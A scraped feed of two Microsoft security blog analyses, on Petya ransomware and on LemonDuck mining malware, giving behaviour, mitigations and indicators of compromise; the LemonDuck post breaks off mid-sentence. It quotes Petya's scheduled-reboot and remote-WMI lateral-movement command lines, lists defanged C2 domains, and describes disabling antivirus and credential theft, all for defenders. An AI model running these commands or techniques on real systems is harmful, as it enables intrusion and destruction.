record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"<system folder>\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute a copy on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"<system folder>\\shutdown.exe /r /f\" /ST <time>_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST <time>_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-28T06:57:43", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2017-06-28T06:57:43", "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the 